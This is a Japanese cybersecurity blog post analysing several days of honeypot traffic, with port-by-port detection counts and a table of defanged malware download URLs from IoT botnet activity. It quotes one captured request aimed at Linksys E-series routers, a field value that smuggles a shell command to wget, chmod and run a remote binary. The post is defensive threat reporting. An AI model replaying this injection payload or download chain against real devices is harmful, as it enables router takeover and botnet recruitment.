sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(238-241日目:4/9-4/11)

238-241日目の簡易分析となります。
※80ポートは除く

f:id:one-chick-sec:20190412230114p:plain

 

f:id:one-chick-sec:20190412230131p:plain


<宛先ポート別検知数>

宛先ポート 検知数 サービス例
445 6443 SMB
8080 1083 PROXY
20022 240 SSH
2222 233 SSH
222 232 SSH
22222 231 SSH
2211 226 SSH
2022 218 SSH
3389 214 RDP
81 131 GoAhead Web Server

SSHに対する通信を多く検知しています。最近はSSHが増加傾向だと思われます。


<新規マルウェアダウンロード>

ポート マルウェアダウンロード先 HTTPリクエストパス VT 備考
8080 hxxp://34[.]80[.]131[.]135/bins/shiina[.]mpsl POST /tmUnblock.cgi

VirusTotal

 
52869 hxxp://134[.]209[.]249[.]142/sbot[.]mip POST /picsdesc.xml 

VirusTotal

 
52869 hxxp://134[.]209[.]249[.]142/sbot[.]netgear[.]mips POST /picsdesc.xml  VirusTotal  
52869 hxxp://185[.]161[.]70[.]165/mips POST /picsdesc.xml  VirusTotal  
52869 hxxp://185[.]172[.]110[.]226/mips POST /picsdesc.xml 

VirusTotal

 
52869 hxxp://185[.]172[.]110[.]227/Corona[.]mips POST /picsdesc.xml  VirusTotal  
52869 hxxp://185[.]172[.]110[.]227/mips POST /picsdesc.xml  VirusTotal  
52869 hxxp://91[.]209[.]70[.]174/Corona[.]mips POST /picsdesc.xml  VirusTotal Gafgyt

今回はIoT系の脆弱性を多めに検知していました(検知条件にミスがあったので一部検知できていなかったことも原因ですが。。。)

◾️気になった通信

POST /tmUnblock.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.20.0

ttcp_ip=-h `cd /tmp; rm -rf Oasis.mpsl; wget hxxp://xxx[.]xxx.xxx.xxx/bins/shiina.mpsl; chmod 777 tmp.mpsl; ./tmp.mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1

Linksys ルータの E シリーズの脆弱性を狙った攻撃です。
今回、まずは Oasis.mpsl を削除していることから、他のマルウェアをまずは駆除した上で実行しています。その後はこれまでと同様の動きと同じで wgetマルウェアをダウンロードし、パーミッションを変更および実行する流れとなります。
UApython-requests/2.20.0であることからツールか何かで実行していると推測されます。

以上となります。